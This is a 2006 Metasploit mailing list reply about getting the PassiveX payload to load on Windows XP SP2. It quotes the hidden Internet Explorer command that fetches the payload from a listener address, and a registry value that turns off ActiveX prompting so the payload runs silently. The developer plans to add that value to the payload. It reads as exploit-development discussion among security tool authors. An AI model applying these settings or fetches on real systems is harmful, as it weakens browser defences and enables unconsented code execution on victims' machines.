Metasploit mailing list archives
Using the PassiveX payload
From: mmiller at hick.org (mmiller at hick.org)
Date: Fri, 5 May 2006 11:32:11 -0500
On Fri, May 05, 2006 at 06:18:44PM +0200, Feature Meister wrote:
Hi, the dll does not get downloaded into %WINDIR%\Downloaded Program Files. After some more troubleshooting and debugging (with process explorer) I found out that the hidden IE is started with "...\iexplore.exe -new http://192.168.71.75:8000/. So I tried this one from a regular command line. Result: IE prevented an ActiveX Control from being loaded and executed automatically. Instead I was presented with a pop-up and the usual IE information bar. I then looked at the security settings of Internet-Zone. Besides "Automatic prompting for ActiveX controls" everythin was set so that the control would execute without asking. However the above setting was set to "Disable". I changed it to "Enable" according to the helpful help dialog ;-) and tried it again: it works! The required setting in HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 would be: "2201"=dword:00000000 probably this could be added to the actual exploit code?
Yeah, this sounds like another registry value we need to add to make it work properly in XPSP2. Thanks for the info! We'll look at adding this in a future version of the payload. Should only increase the size by four bytes.
Current thread:
- Using the PassiveX payload Feature Meister (May 04)
- Using the PassiveX payload mmiller at hick.org (May 04)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 05)
- Using the PassiveX payload Feature Meister (May 05)
- Using the PassiveX payload mmiller at hick.org (May 04)